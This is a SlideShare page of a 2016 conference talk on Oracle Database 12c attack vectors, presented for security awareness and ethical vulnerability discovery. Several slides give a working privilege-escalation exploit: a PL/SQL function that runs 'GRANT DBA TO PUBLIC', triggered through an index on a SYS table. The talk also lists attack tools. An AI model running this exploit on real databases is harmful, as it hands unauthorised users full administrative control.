SlideShare a Scribd company logo

Oracle Database 12c Attack Vectors

Download as PPTX, PDF
Martin Toshev
Martin Toshev

Martin Toshev presented on attack vectors against Oracle database 12c. He began by providing real world examples of attacks, such as privilege escalation exploits. He then discussed potential attack vectors, including those originating from unauthorized, authorized with limited privileges, and SYSDBA users. Finally, he outlined approaches for discovering new vulnerabilities and recommended tools for testing Oracle database security.

Software
1 of 50
Downloaded 47 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
Oracle database 12c attack vectors Martin Toshev, BGOUG, 04.06.2016
Who am I Software consultant (CoffeeCupConsulting) BG JUG board member (http://jug.bg) OpenJDK and Oracle RDBMS enthusiast
Who am I Author of Learning RabbitMQ
Agenda • Real world examples • Attack vectors • Attack discovery approach • Tools
Real world examples
Real world examples source: http://tech.firstpost.com/news-analysis/oracles-database-secure-even-nsa-cant-hack-us-say- larry-ellison-217341.html, 30 Jan, 2014
Real world examples However …
Real world examples Source: http://www.cnet.com/news/oracle-databases-easy-to-hack-says-researcher/ "Disable the protocol in Version 11.1 and start using older versions like Version 10g," which is not vulnerable” they didn't fix the current version, which leaves 11.1 and 11.2 still susceptible to attacks
Real world examples Source: http://www.joxeankoret.com/download/tnspoison.pdf/
Real world examples Source: http://www.itsec.gov.cn/webportal/download/2005_Search_Engine_Attack_Database.pdf Simple example: 1) https://www.google.ca/advanced_search 2) search for ‘/isqlplus’ and specify 'URL only' 3) voila
Real world examples Source: http://thehackernews.com/2014/08/Vulnerability-Oracle-Data-Redaction-Security.html
Real world examples Source: http://www.reuters.com/article/us-oracle-hackers-idUSTRE56L66D20090722 http://www.theinquirer.net/inquirer/news/1469225/oracle-databases-hacked-script-kiddies
Real world examples Source: http://www.dba-oracle.com/t_hackers_breaches_horror_stories.htm
Real world examples Source: http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
Real world examples • Privelege escalation via indexes in 12c: -- from SYS: create c##autoexec user CREATE USER c##autoexec IDENTIFIED BY 123; GRANT CREATE SESSION TO c##autoexec; GRANT CREATE PROCEDURE TO c##autoexec; ALTER USER C##autoexec QUOTA 100M ON USERS; CREATE TABLE foo ( Id int ); INSERT INTO sys.foo values (100); INSERT INTO sys.foo values (50); GRANT INDEX ON foo to c##autoexec; GRANT SELECT, INSERT ON foo TO c##autoexec;
Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec: attempt to set the DBA role - FAILS SET ROLE DBA;
Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC'; COMMIT; RETURN 'FOO'; END;
Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec GRANT EXECUTE ON GETDBA TO public; CREATE INDEX EXPLOIT_INDEX ON SYS.FOO(C##AUTOEXEC.GETDBA('')); -- from SYSDBA SELECT * FROM sys.foo; -- from c##autoexec: SUCCESS SET ROLE DBA;
Attack vectors
Attack vectors • Let’s have a look at the high level architecture of the database …
Attack vectors unauthorized authorized (limited permissions) authorized (SYSDBA) OS level
Attack vectors • Attack vectors can originate from different sources depending on the setup (we will abstract ourselves from this criteria): – external (applications running publicly, vulnerable protocols running on the database servers, malware enabling machine access) – internal (employees with non-dba access, DBAs, OS-level users)
Attack vectors • Attacks from unauthorized users: – reconnaissance: • looking for application servers and database tools running on the database publicly • using search engines to find Oracle directory indices, web apps (such as isqlplus) running publicly • port scanning for well known ports (such as 1521 for the TNS listener) on target machines
Attack vectors • Attacks from unauthorized users: – gaining access: • exploring misconfiguration - using default credentials • exploring lack of identity policy – password brute forcing • exploring security bugs (e.g. buffer overflow enabling arbitrary command execution on the TNS listener)
Attack vectors • Attacks from unauthorized users: – data theft: • exploring lack of encryption leading to man-in-the-middle attacks (e.g. TNS listener poisoning or eavesdropping) – DoS/DDoS attacks: • network level DoS (e.g. excessive packets) • buffer overflow DoS (e.g. bug in the TNS listener)
Attack vectors • Attacks from authorized users with limited permissions: – SQL injection (typically caused by buggy applications having a DB user with excessive privileges) – DoS attacks (e.g. due to misconfiguration – excessive connections, filling shared tablespaces, running complex queries)
Attack vectors • Attacks from authorized users with limited permissions: – privilege escalation (e.g. via the INDEX permission) – data theft (e.g. via PL/SQL procedure injection, scheduling opening of remote socket connections to external sources)
Attack vectors • SYSDBA access … the world is yours • OS level access – many methods to retrieve passwords and useful data from raw Oracle database files
Attack discovery approach
Attack discovery approach • Already uncovered security bugs as the ones we discussed are fixed and released by Oracle as critical patch updates • But how to uncover new bugs and ethically report them before being discovered by attackers ?
Attack discovery approach • Explore new features (e.g. multitenancy) • See what parts of the security architecture of the database are in use by these features • Explore changes to the security architecture and new security features
Attack discovery approach • For top 12c new features (at a glance): – consolidation (pluggable databases) – redaction policy
Attack discovery approach • For top 12c new features (at a glance): – consolidation (pluggable databases) – resource utilization of PDBs, access boundary between PDBs, secure data replication between PDBs, discrepancies in local/common users/roles ? – redaction policy – other built-in functions/mechanisms that can reveal redacted data ? (we already saw some)
Attack discovery approach • For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – Online Migration of Table Partition or Sub Partition
Attack discovery approach • For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – bypassing security mechanism, privilege escalation ? – Online Migration of Table Partition or Sub Partition – data theft ?
Attack discovery approach • For top 12c new features (at a glance): – Full Database Caching – SQL translation framework
Attack discovery approach • For top 12c new features (at a glance): – Full Database Caching – buffer overflows, DoS, malicious in-memory data manipulation ? – SQL translation framework – malicious third-party translation plug-ins, security bugs in translation plug- ins ?
Attack discovery approach explore existing attacks and security bugs (e.g. use packet crafting tools to try buffer overflow attacks over enhancements of database protocols) explore vulnerability databases such as CVE for exploits and try to adapt some of them to new database features
Attack discovery approach make use of proper penetration testing tool such as Metasploit to adapt existing attacks for 10g/11g or older versions to 12c analyze new PL/SQL packages for security leaks disassemble Oracle binaries
Attack discovery approach • You may, of course, discover issues not introduced in 12c but rather propagating through multiple versions (such as the TNS poison vulnerability) …
Tools
Tools • nmap • Metasploit • Tnscmd • ODAT (Oracle Database Attacking Tool) • w32dasm/ IDA Freeware • Kali Linux
Tools • ODAT supports 12.1.0.2.0: – try to find valid SIDs and credentials – try to escalate valid account to DBA or SYSDBA – try to execute OS commands from a valid account
Some readings that may bring ideas …
Some readings that may bring ideas …
Thank you ! Q&A
References Oracle 12c Security whitepaper http://www.oracle.com/technetwork/database/security/security-compliance- wp-12c-1896112.pdf Oracle Database 12c architecture overview https://www.youtube.com/watch?v=266ay9N6kAw Oracle Database 12c New security Features http://www.trivadis.com/sites/default/files/downloads/soe_oracle_da tabase_12_new_security_features_summary.pdf
References Oracle Database 12c security http://docs.oracle.com/database/121/nav/portal_25.htm Oracle database security checklist http://www.isaca.org/groups/professional-english/oracle- database/groupdocuments/twp-security-checklist-database-1-132870.pdf Encryption and Redaction in Oracle Database 12c with Oracle Advanced Security http://www.oracle.com/technetwork/database/options/advanced- security/advanced-security-wp-12c-1896139.pdf
References Privelege escalation via Oracle indexes http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf Attacking Oracle with the Metasploit Framework http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates- OracleMetasploit-SLIDES.pdf Oracle Database TNS Listener Poison Attack http://www.joxeankoret.com/download/tnspoison.pdf
References ODAT (Oracle Database Attacking Tool) tool https://github.com/quentinhardy/odat Oracle Database 12c CVE vulnerabilities statistics https://www.cvedetails.com/product/467/Oracle-Database- Server.html?vendor_id=93 Oracle Database 12c CVE vulnerabilities https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id- 467/cvssscoremin-5/cvssscoremax-5.99/Oracle-Database-Server.html

More Related Content

What's hot (20)

PDF
Hacking oracle using metasploit
Alberto García Illera
 
PDF
State of Solr Security 2016: Presented by Ishan Chattopadhyaya, Lucidworks
Lucidworks
 
PDF
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
CODE WHITE GmbH
 
PDF
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
PDF
Mitigating Java Deserialization attacks from within the JVM
Apostolos Giannakidis
 
PDF
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Christian Schneider
 
PDF
Java Security Manager Reloaded - Devoxx 2014
Josef Cacek
 
PPT
Hack.Lu 2010 - Escaping Protected Mode Internet Explorer
Tom Keetch
 
PDF
Java Security Manager Reloaded - jOpenSpace Lightning Talk
Josef Cacek
 
PDF
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat Security Conference
 
PPTX
Hacking Oracle From Web Apps 1 9
sumsid1234
 
PDF
Attacking Oracle with the Metasploit Framework
Chris Gates
 
PDF
NCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group
 
PDF
Malicious File for Exploiting Forensic Software
Takahiro Haruyama
 
PDF
[Wroclaw #7] Why So Serial?
OWASP
 
PPTX
Exploiting NoSQL Like Never Before
Francis Alexander
 
PDF
Mitigating Java Deserialization attacks from within the JVM (improved version)
Apostolos Giannakidis
 
PDF
NoSQL, no security?
wurbanski
 
PDF
Understanding Windows Access Token Manipulation
Justin Bui
 
PDF
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
CODE WHITE GmbH
 
Hacking oracle using metasploit
Alberto García Illera
 
State of Solr Security 2016: Presented by Ishan Chattopadhyaya, Lucidworks
Lucidworks
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
CODE WHITE GmbH
 
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Mitigating Java Deserialization attacks from within the JVM
Apostolos Giannakidis
 
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Christian Schneider
 
Java Security Manager Reloaded - Devoxx 2014
Josef Cacek
 
Hack.Lu 2010 - Escaping Protected Mode Internet Explorer
Tom Keetch
 
Java Security Manager Reloaded - jOpenSpace Lightning Talk
Josef Cacek
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat Security Conference
 
Hacking Oracle From Web Apps 1 9
sumsid1234
 
Attacking Oracle with the Metasploit Framework
Chris Gates
 
NCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group
 
Malicious File for Exploiting Forensic Software
Takahiro Haruyama
 
[Wroclaw #7] Why So Serial?
OWASP
 
Exploiting NoSQL Like Never Before
Francis Alexander
 
Mitigating Java Deserialization attacks from within the JVM (improved version)
Apostolos Giannakidis
 
NoSQL, no security?
wurbanski
 
Understanding Windows Access Token Manipulation
Justin Bui
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
CODE WHITE GmbH
 

Viewers also liked (20)

PPTX
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Rob Fuller
 
PPTX
Oracle database threats - LAOUC Webinar
Osama Mustafa
 
PDF
Asynchroniczny PHP i komunikacja czasu rzeczywistego z wykorzystaniem websocketw
Luke Adamczewski
 
PPTX
Przetwarzanie asynchroniczne w zastosowaniach webowych
leafnode
 
PDF
Think Like a Hacker - Database Attack Vectors
Mark Ginnebaugh
 
PDF
Sécurité informatique : le Retour sur Investissement que vous n'attendiez pas
Maxime ALAY-EDDINE
 
PPTX
Modularity of The Java Platform Javaday (http://javaday.org.ua/)
Martin Toshev
 
PPTX
Writing Stored Procedures with Oracle Database 12c
Martin Toshev
 
PPTX
Writing Stored Procedures in Oracle RDBMS
Martin Toshev
 
PPTX
Writing Java Stored Procedures in Oracle 12c
Martin Toshev
 
PPTX
Modular Java
Martin Toshev
 
PPTX
RxJS vs RxJava: Intro
Martin Toshev
 
PPTX
Spring RabbitMQ
Martin Toshev
 
PDF
KDB database (EPAM tech talks, Sofia, April, 2015)
Martin Toshev
 
PPTX
hacking with node.JS
Harsha Vashisht
 
PDF
Eclipse plug in development
Martin Toshev
 
PPTX
JVM++: The Graal VM
Martin Toshev
 
PDF
Security Challenges in Node.js
Websecurify
 
PDF
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
StHack
 
PDF
Oracle database 12c client installation overview
bupbechanhgmail
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Rob Fuller
 
Oracle database threats - LAOUC Webinar
Osama Mustafa
 
Asynchroniczny PHP i komunikacja czasu rzeczywistego z wykorzystaniem websocketw
Luke Adamczewski
 
Przetwarzanie asynchroniczne w zastosowaniach webowych
leafnode
 
Think Like a Hacker - Database Attack Vectors
Mark Ginnebaugh
 
Sécurité informatique : le Retour sur Investissement que vous n'attendiez pas
Maxime ALAY-EDDINE
 
Modularity of The Java Platform Javaday (http://javaday.org.ua/)
Martin Toshev
 
Writing Stored Procedures with Oracle Database 12c
Martin Toshev
 
Writing Stored Procedures in Oracle RDBMS
Martin Toshev
 
Writing Java Stored Procedures in Oracle 12c
Martin Toshev
 
Modular Java
Martin Toshev
 
RxJS vs RxJava: Intro
Martin Toshev
 
Spring RabbitMQ
Martin Toshev
 
KDB database (EPAM tech talks, Sofia, April, 2015)
Martin Toshev
 
hacking with node.JS
Harsha Vashisht
 
Eclipse plug in development
Martin Toshev
 
JVM++: The Graal VM
Martin Toshev
 
Security Challenges in Node.js
Websecurify
 
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
StHack
 
Oracle database 12c client installation overview
bupbechanhgmail
 
Ad

Similar to Oracle Database 12c Attack Vectors (20)

PDF
DATABASE PRIVATE SECURITY JURISPRUDENCE: A CASE STUDY USING ORACLE
IJDMS
 
PDF
Database Private Security Jurisprudence: A Case Study using Oracle
IJDMS
 
PDF
AV/DF Advanced Security Option
DLT Solutions
 
PPTX
Security Inside Out: Latest Innovations in Oracle Database 12c
Troy Kitch
 
PDF
ppt-security-dbsat-222-overview-nodemo.pdf
camyla81
 
DOCX
Database Security – Issues and Best PracticesOutline
OllieShoresna
 
PDF
Ce hv6 module 42 hacking database servers
Vi Tính Hoàng Nam
 
PDF
Dr3150012012202 1.getting started
Namgu Jeong
 
PDF
DOAG Oracle Database Vault
Stefan Oehrli
 
PDF
Presentation anatomy of a database attack
xKinAnx
 
PDF
Presentation database security audit vault & database firewall
xKinAnx
 
PPTX
An AMIS Overview of Oracle database 12c (12.1)
Marco Gralike
 
PDF
An AMIS overview of database 12c
Getting value from IoT, Integration and Data Analytics
 
PDF
Best Practices for implementing Database Security Comprehensive Database Secu...
Kal BO
 
PDF
Oracle Database 11g Security and Compliance Solutions - By Tom Kyte
Edgar Alejandro Villegas
 
PDF
Engineered Systems - nejlepší cesta, jak zabezpečit váš dataAccelerate Cloud
MarketingArrowECS_CZ
 
PDF
Hacking databases
sunil kumar
 
PDF
Hacking databases
sunil kumar
 
PDF
Oracle database 12c security and compliance
FITSFSd
 
PDF
A1802030104
IOSR Journals
 
DATABASE PRIVATE SECURITY JURISPRUDENCE: A CASE STUDY USING ORACLE
IJDMS
 
Database Private Security Jurisprudence: A Case Study using Oracle
IJDMS
 
AV/DF Advanced Security Option
DLT Solutions
 
Security Inside Out: Latest Innovations in Oracle Database 12c
Troy Kitch
 
ppt-security-dbsat-222-overview-nodemo.pdf
camyla81
 
Database Security – Issues and Best PracticesOutline
OllieShoresna
 
Ce hv6 module 42 hacking database servers
Vi Tính Hoàng Nam
 
Dr3150012012202 1.getting started
Namgu Jeong
 
DOAG Oracle Database Vault
Stefan Oehrli
 
Presentation anatomy of a database attack
xKinAnx
 
Presentation database security audit vault & database firewall
xKinAnx
 
An AMIS Overview of Oracle database 12c (12.1)
Marco Gralike
 
An AMIS overview of database 12c
Getting value from IoT, Integration and Data Analytics
 
Best Practices for implementing Database Security Comprehensive Database Secu...
Kal BO
 
Oracle Database 11g Security and Compliance Solutions - By Tom Kyte
Edgar Alejandro Villegas
 
Engineered Systems - nejlepší cesta, jak zabezpečit váš dataAccelerate Cloud
MarketingArrowECS_CZ
 
Hacking databases
sunil kumar
 
Hacking databases
sunil kumar
 
Oracle database 12c security and compliance
FITSFSd
 
A1802030104
IOSR Journals
 
Ad

More from Martin Toshev (13)

PPTX
Building highly scalable data pipelines with Apache Spark
Martin Toshev
 
PPTX
Big data processing with Apache Spark and Oracle Database
Martin Toshev
 
PPT
Jdk 10 sneak peek
Martin Toshev
 
PPT
Semantic Technology In Oracle Database 12c
Martin Toshev
 
PPTX
Practical security In a modular world
Martin Toshev
 
PPT
Java 9 Security Enhancements in Practice
Martin Toshev
 
PPTX
Java 9 sneak peek
Martin Toshev
 
PPTX
Spring RabbitMQ
Martin Toshev
 
PDF
Concurrency Utilities in Java 8
Martin Toshev
 
PPTX
The RabbitMQ Message Broker
Martin Toshev
 
PPTX
java2days 2014: Attacking JavaEE Application Servers
Martin Toshev
 
PPTX
Modularity of the Java Platform (OSGi, Jigsaw and Penrose)
Martin Toshev
 
PPTX
New Features in JDK 8
Martin Toshev
 
Building highly scalable data pipelines with Apache Spark
Martin Toshev
 
Big data processing with Apache Spark and Oracle Database
Martin Toshev
 
Jdk 10 sneak peek
Martin Toshev
 
Semantic Technology In Oracle Database 12c
Martin Toshev
 
Practical security In a modular world
Martin Toshev
 
Java 9 Security Enhancements in Practice
Martin Toshev
 
Java 9 sneak peek
Martin Toshev
 
Spring RabbitMQ
Martin Toshev
 
Concurrency Utilities in Java 8
Martin Toshev
 
The RabbitMQ Message Broker
Martin Toshev
 
java2days 2014: Attacking JavaEE Application Servers
Martin Toshev
 
Modularity of the Java Platform (OSGi, Jigsaw and Penrose)
Martin Toshev
 
New Features in JDK 8
Martin Toshev
 

Recently uploaded (20)

PPT
MergeSortfbsjbjsfk sdfik k
RafishaikIT02044
 
PDF
Automate Cybersecurity Tasks with Python
VICTOR MAESTRE RAMIREZ
 
PPTX
MiniTool Power Data Recovery Full Crack Latest 2025
muhammadgurbazkhan
 
PPTX
3uTools Full Crack Free Version Download [Latest] 2025
muhammadgurbazkhan
 
PDF
Digger Solo: Semantic search and maps for your local files
seanpedersen96
 
PDF
Executive Business Intelligence Dashboards
vandeslie24
 
PDF
Alexander Marshalov - How to use AI Assistants with your Monitoring system Q2...
VictoriaMetrics
 
PPTX
Tally software_Introduction_Presentation
AditiBansal54083
 
PDF
Powering GIS with FME and VertiGIS - Peak of Data & AI 2025
Safe Software
 
PDF
Beyond Binaries: Understanding Diversity and Allyship in a Global Workplace -...
Imma Valls Bernaus
 
PPTX
Comprehensive Guide: Shoviv Exchange to Office 365 Migration Tool 2025
Shoviv Software
 
PPTX
Writing Better Code - Helping Developers make Decisions.pptx
Lorraine Steyn
 
PPTX
The Role of a PHP Development Company in Modern Web Development
SEO Company for School in Delhi NCR
 
PPTX
Platform for Enterprise Solution - Java EE5
abhishekoza1981
 
PDF
Salesforce CRM Services.VALiNTRY360
VALiNTRY360
 
PDF
Alarm in Android-Scheduling Timed Tasks Using AlarmManager in Android.pdf
Nabin Dhakal
 
PDF
Thread In Android-Mastering Concurrency for Responsive Apps.pdf
Nabin Dhakal
 
PPTX
Revolutionizing Code Modernization with AI
KrzysztofKkol1
 
PDF
HiHelloHR – Simplify HR Operations for Modern Workplaces
HiHelloHR
 
PDF
Efficient, Automated Claims Processing Software for Insurers
Insurance Tech Services
 
MergeSortfbsjbjsfk sdfik k
RafishaikIT02044
 
Automate Cybersecurity Tasks with Python
VICTOR MAESTRE RAMIREZ
 
MiniTool Power Data Recovery Full Crack Latest 2025
muhammadgurbazkhan
 
3uTools Full Crack Free Version Download [Latest] 2025
muhammadgurbazkhan
 
Digger Solo: Semantic search and maps for your local files
seanpedersen96
 
Executive Business Intelligence Dashboards
vandeslie24
 
Alexander Marshalov - How to use AI Assistants with your Monitoring system Q2...
VictoriaMetrics
 
Tally software_Introduction_Presentation
AditiBansal54083
 
Powering GIS with FME and VertiGIS - Peak of Data & AI 2025
Safe Software
 
Beyond Binaries: Understanding Diversity and Allyship in a Global Workplace -...
Imma Valls Bernaus
 
Comprehensive Guide: Shoviv Exchange to Office 365 Migration Tool 2025
Shoviv Software
 
Writing Better Code - Helping Developers make Decisions.pptx
Lorraine Steyn
 
The Role of a PHP Development Company in Modern Web Development
SEO Company for School in Delhi NCR
 
Platform for Enterprise Solution - Java EE5
abhishekoza1981
 
Salesforce CRM Services.VALiNTRY360
VALiNTRY360
 
Alarm in Android-Scheduling Timed Tasks Using AlarmManager in Android.pdf
Nabin Dhakal
 
Thread In Android-Mastering Concurrency for Responsive Apps.pdf
Nabin Dhakal
 
Revolutionizing Code Modernization with AI
KrzysztofKkol1
 
HiHelloHR – Simplify HR Operations for Modern Workplaces
HiHelloHR
 
Efficient, Automated Claims Processing Software for Insurers
Insurance Tech Services
 

Oracle Database 12c Attack Vectors

  • 1. Oracle database 12c attack vectors Martin Toshev, BGOUG, 04.06.2016
  • 2. Who am I Software consultant (CoffeeCupConsulting) BG JUG board member (http://jug.bg) OpenJDK and Oracle RDBMS enthusiast
  • 3. Who am I Author of Learning RabbitMQ
  • 4. Agenda • Real world examples • Attack vectors • Attack discovery approach • Tools
  • 6. Real world examples source: http://tech.firstpost.com/news-analysis/oracles-database-secure-even-nsa-cant-hack-us-say- larry-ellison-217341.html, 30 Jan, 2014
  • 8. Real world examples Source: http://www.cnet.com/news/oracle-databases-easy-to-hack-says-researcher/ "Disable the protocol in Version 11.1 and start using older versions like Version 10g," which is not vulnerable” they didn't fix the current version, which leaves 11.1 and 11.2 still susceptible to attacks
  • 9. Real world examples Source: http://www.joxeankoret.com/download/tnspoison.pdf/
  • 10. Real world examples Source: http://www.itsec.gov.cn/webportal/download/2005_Search_Engine_Attack_Database.pdf Simple example: 1) https://www.google.ca/advanced_search 2) search for ‘/isqlplus’ and specify 'URL only' 3) voila
  • 11. Real world examples Source: http://thehackernews.com/2014/08/Vulnerability-Oracle-Data-Redaction-Security.html
  • 12. Real world examples Source: http://www.reuters.com/article/us-oracle-hackers-idUSTRE56L66D20090722 http://www.theinquirer.net/inquirer/news/1469225/oracle-databases-hacked-script-kiddies
  • 13. Real world examples Source: http://www.dba-oracle.com/t_hackers_breaches_horror_stories.htm
  • 14. Real world examples Source: http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
  • 15. Real world examples • Privelege escalation via indexes in 12c: -- from SYS: create c##autoexec user CREATE USER c##autoexec IDENTIFIED BY 123; GRANT CREATE SESSION TO c##autoexec; GRANT CREATE PROCEDURE TO c##autoexec; ALTER USER C##autoexec QUOTA 100M ON USERS; CREATE TABLE foo ( Id int ); INSERT INTO sys.foo values (100); INSERT INTO sys.foo values (50); GRANT INDEX ON foo to c##autoexec; GRANT SELECT, INSERT ON foo TO c##autoexec;
  • 16. Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec: attempt to set the DBA role - FAILS SET ROLE DBA;
  • 17. Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC'; COMMIT; RETURN 'FOO'; END;
  • 18. Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec GRANT EXECUTE ON GETDBA TO public; CREATE INDEX EXPLOIT_INDEX ON SYS.FOO(C##AUTOEXEC.GETDBA('')); -- from SYSDBA SELECT * FROM sys.foo; -- from c##autoexec: SUCCESS SET ROLE DBA;
  • 20. Attack vectors • Let’s have a look at the high level architecture of the database …
  • 21. Attack vectors unauthorized authorized (limited permissions) authorized (SYSDBA) OS level
  • 22. Attack vectors • Attack vectors can originate from different sources depending on the setup (we will abstract ourselves from this criteria): – external (applications running publicly, vulnerable protocols running on the database servers, malware enabling machine access) – internal (employees with non-dba access, DBAs, OS-level users)
  • 23. Attack vectors • Attacks from unauthorized users: – reconnaissance: • looking for application servers and database tools running on the database publicly • using search engines to find Oracle directory indices, web apps (such as isqlplus) running publicly • port scanning for well known ports (such as 1521 for the TNS listener) on target machines
  • 24. Attack vectors • Attacks from unauthorized users: – gaining access: • exploring misconfiguration - using default credentials • exploring lack of identity policy – password brute forcing • exploring security bugs (e.g. buffer overflow enabling arbitrary command execution on the TNS listener)
  • 25. Attack vectors • Attacks from unauthorized users: – data theft: • exploring lack of encryption leading to man-in-the-middle attacks (e.g. TNS listener poisoning or eavesdropping) – DoS/DDoS attacks: • network level DoS (e.g. excessive packets) • buffer overflow DoS (e.g. bug in the TNS listener)
  • 26. Attack vectors • Attacks from authorized users with limited permissions: – SQL injection (typically caused by buggy applications having a DB user with excessive privileges) – DoS attacks (e.g. due to misconfiguration – excessive connections, filling shared tablespaces, running complex queries)
  • 27. Attack vectors • Attacks from authorized users with limited permissions: – privilege escalation (e.g. via the INDEX permission) – data theft (e.g. via PL/SQL procedure injection, scheduling opening of remote socket connections to external sources)
  • 28. Attack vectors • SYSDBA access … the world is yours • OS level access – many methods to retrieve passwords and useful data from raw Oracle database files
  • 30. Attack discovery approach • Already uncovered security bugs as the ones we discussed are fixed and released by Oracle as critical patch updates • But how to uncover new bugs and ethically report them before being discovered by attackers ?
  • 31. Attack discovery approach • Explore new features (e.g. multitenancy) • See what parts of the security architecture of the database are in use by these features • Explore changes to the security architecture and new security features
  • 32. Attack discovery approach • For top 12c new features (at a glance): – consolidation (pluggable databases) – redaction policy
  • 33. Attack discovery approach • For top 12c new features (at a glance): – consolidation (pluggable databases) – resource utilization of PDBs, access boundary between PDBs, secure data replication between PDBs, discrepancies in local/common users/roles ? – redaction policy – other built-in functions/mechanisms that can reveal redacted data ? (we already saw some)
  • 34. Attack discovery approach • For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – Online Migration of Table Partition or Sub Partition
  • 35. Attack discovery approach • For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – bypassing security mechanism, privilege escalation ? – Online Migration of Table Partition or Sub Partition – data theft ?
  • 36. Attack discovery approach • For top 12c new features (at a glance): – Full Database Caching – SQL translation framework
  • 37. Attack discovery approach • For top 12c new features (at a glance): – Full Database Caching – buffer overflows, DoS, malicious in-memory data manipulation ? – SQL translation framework – malicious third-party translation plug-ins, security bugs in translation plug- ins ?
  • 38. Attack discovery approach explore existing attacks and security bugs (e.g. use packet crafting tools to try buffer overflow attacks over enhancements of database protocols) explore vulnerability databases such as CVE for exploits and try to adapt some of them to new database features
  • 39. Attack discovery approach make use of proper penetration testing tool such as Metasploit to adapt existing attacks for 10g/11g or older versions to 12c analyze new PL/SQL packages for security leaks disassemble Oracle binaries
  • 40. Attack discovery approach • You may, of course, discover issues not introduced in 12c but rather propagating through multiple versions (such as the TNS poison vulnerability) …
  • 41. Tools
  • 42. Tools • nmap • Metasploit • Tnscmd • ODAT (Oracle Database Attacking Tool) • w32dasm/ IDA Freeware • Kali Linux
  • 43. Tools • ODAT supports 12.1.0.2.0: – try to find valid SIDs and credentials – try to escalate valid account to DBA or SYSDBA – try to execute OS commands from a valid account
  • 44. Some readings that may bring ideas …
  • 45. Some readings that may bring ideas …
  • 47. References Oracle 12c Security whitepaper http://www.oracle.com/technetwork/database/security/security-compliance- wp-12c-1896112.pdf Oracle Database 12c architecture overview https://www.youtube.com/watch?v=266ay9N6kAw Oracle Database 12c New security Features http://www.trivadis.com/sites/default/files/downloads/soe_oracle_da tabase_12_new_security_features_summary.pdf
